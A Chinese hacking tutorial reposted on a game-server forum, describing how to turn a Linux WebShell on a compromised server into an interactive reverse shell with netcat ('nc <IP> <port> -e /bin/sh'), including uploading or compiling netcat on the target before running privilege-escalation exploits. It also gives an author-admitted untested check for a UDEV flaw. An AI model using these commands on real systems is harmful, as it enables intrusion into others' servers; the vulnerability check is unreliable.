设为首页
收藏本站
开启辅助访问
切换到宽版
登录
立即注册
只需一步,快速开始
首页
Portal
论坛
BBS
新鲜出炉
免费列表
联系我们
搜索
搜索
文章
安全
安全
统计
传奇版本
精品软件
传奇工具
水漫金山
传奇教程
福利经验
传奇技术
素材补丁
引擎帮助
网站程序
动画发布
开区工具
站点公告
传奇故事
站点版规
关于报毒
在线工具
违规处里
站点帮助
站务处理
本版
帖子
用户
传奇GM论坛
»
论坛
›
精品版本
›
微端版本
›
Linux下通过WebShell反弹CmdLineShell
返回列表
发新帖
Linux下通过WebShell反弹CmdLineShell
[复制链接]
332
|
0
|
2012-4-1 19:16:33
|
显示全部楼层
|
阅读模式
Author:zerosoul(零魂)
转载请注明出处,否则就别转....(昨天又不小心搜到篇自己以前写的文章,转了很多地方,没见一个写版权的)
昨晚(应该是今天凌晨)玩了半天朋友给的Linux的WebShell,本来想实践一下UDEV提权呢,最后发现服务器貌似已经打过补丁了。
不过还是有其他的收获的,所以我就YY下Linux反弹shell的问题。
Linux提权绝大部分都靠的是LocalExploit。WebShell一般都可以执行命令,但是我们的EXP必须在可交互环境运行,否则如果直接在WebShell执行,即使能提权成功,我们也没法利用到。所以我们需要先反弹一个CmdLineShell回来(直接说成CmdShell怕人误解...因为Win有个cmd.exe^_^),然后在命令行终端下执行EXP进行提权。
一般情况下,绝大多数人都会通过PHPWebShell的BackConnect功能弹回一个Shell,但是有时候会碰到服务器不支持PHP或者WebShell没法反弹的情况,比如这两天朋友给我的一个JSPShell所在服务器只支持JSP,不支持PHP。这时候,我们经典的netcat就可以派上用场了。
平时在Windows下做事的时候,在必要的情况下我们可以先在本机运行nc-vv-lp1234监听端口,然后在肉鸡上nc12.21.12.211234-ecmd.exe给我们反弹一个CmdShell,这个方法在Linux仍然可行。
在本机监听后,在WebShell运行nc12.21.12.211234-e/bin/sh就能弹一个CmdLineShell给我们。
但我们经常碰到的情况并不都是这么100%顺利的,像昨晚整的那两台,每台都是不能直接执行nc的。一台有nc,但执行从是不起作用,另外一台直接压根就没有nc....
不过,这个难不倒我们,我们可以给他装一个嘛,比较快捷的方法是,我们可以到linux机器上编译好以后把bin文件传上去(我开始传的我的Debian自带的netcat,结果仍然不能运行....)。如果还不行,那就把源码传上去,在目标机器上直接编译。
昨晚那两台机器,一台我是直接传的本地编译后的,一台是在目标机器上编译的。如果直接传的nc可以运行的话还比较好说,如果需要在目标机器上编译的话,这里有点小技巧:
因为在得到CmdLineShell前,我们只能在WebShell里执行命令,一般每次只能执行一条,然后等回显。假如我们的WebShell在/var/www/site目录,那么我们每次执行命令默认的当前路径都是/var/www/site,而我们的netcat源码包解压在了/tmp/netcatsrc文件夹,这样的话,我们编译netcat的时候,configure还好说,可用/tmp/netcatsrc/configure命令,但下一步make的时候就不行了,因为当前路径是/var/www/site,而不是我们想要的/tmp/netcatsrc/,所以我们configure完了make的时候会报错。
解决这个问题其实也很简单,可以直接把两句写成一句就可以:cd/tmp/netcatsrc;make
用分号隔开写,把make跟在目录切换命令后面,这样编译的时候就不会报错了。(流浪猫教的..^_^)
在还没有得到CmdLineShell的时候,这样的写法还是很有用的。
编译成功以后,我们就可以输入命令反弹Shell了(比如我这里nc路径是/tmp/nc):
本地nc-vv-lp80后
/tmp/nc202.xx.xx.25080-e/bin/sh就可以给我吗弹回来一个CmdLineShell。
效果
----------------
要注意反弹的LinuxShell是没有$提示符的哦,执行一句返回一句。
还有一点就是这里反弹Shell的时候我运行的是/bin/sh,当然运行/bin/bash也可以。
不过我觉得最好还是运行/bin/sh吧,因为/bin/sh的权限比/bin/bash放的更开一些
顺便说一下怎么判断目标是否有UDEV这个漏洞。
Linux我还不知道怎么样查看它是否打过这个补丁,所以我想了个比较简单的办法:
1.执行cat/proc/net/netlink,记录下PID
A
2.执行psaux|grepudev,记下root的PID
B
3.如果
A=
B-1
,则存在漏洞,否则不存在
这是我自己想的,因为获得PID的时候有这两种方法,所以我通过他们对比来判断,
但我并不能确定我这方法是100%正确的
,仅供参考。
效果
在反弹的Shell里执行,发现得到的PID不一样,2487!=1230
*
发帖前要善用
【
论坛搜索
】
功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。
回复
使用道具
举报
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
显身卡
返回列表
发新帖
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
本版积分规则
发表回复
回帖后跳转到最后一页
飞尔
回复楼主
返回列表
图文推荐
传世1.994天元心法版,啸天虎,副本任务,珍宝阁奖励
2011-06-30
最新烟雨寒雪暴力来袭靓装四连击传奇版本,给力嚣张,傲世青龙(3K引擎)
2011-07-01
新注册会员无法接收到验证邮件问题及解决方法
2011-12-17
2011最新火爆3D真彩地图,1.96梦幻变身QQ三钻黄金皓月升级版(...
2011-06-20
2003复古蓝色飞刀我本沉默,倚天劈地,押镖系统,九绝剑魔(Her...
2012-03-30
热门排行
1
2003复古蓝色飞刀我本沉默,倚天劈地,押镖系统,九绝剑魔(Her...
2
超爽给力3D真彩韩版诸神灭佛中变版,皇冠至尊,天地归一(Her...
3
1.96紫仙刺影四钻元素轻变版,冰神皓月,黄金矿工,紫仙合成(...
4
独家四皇冠《救世主》3D真彩地图中变靓装版,终结者神地(H...
5
2012最新青龍白虎中变皇冠之神靓装版,龙神宝殿,白虎之都(H...
6
1.95龙战刺影神龙合击版,刺影之城,神龙之地,幽冥神盾(3k引擎)
7
New盟重新城暗杀来袭第八季武动乾坤,枯海神舰,斗气大陆(Ma...
8
1.76复古精品加强版,爵位封号,亡灵古墓,夺宝奇兵,精品神殿(Hero引擎)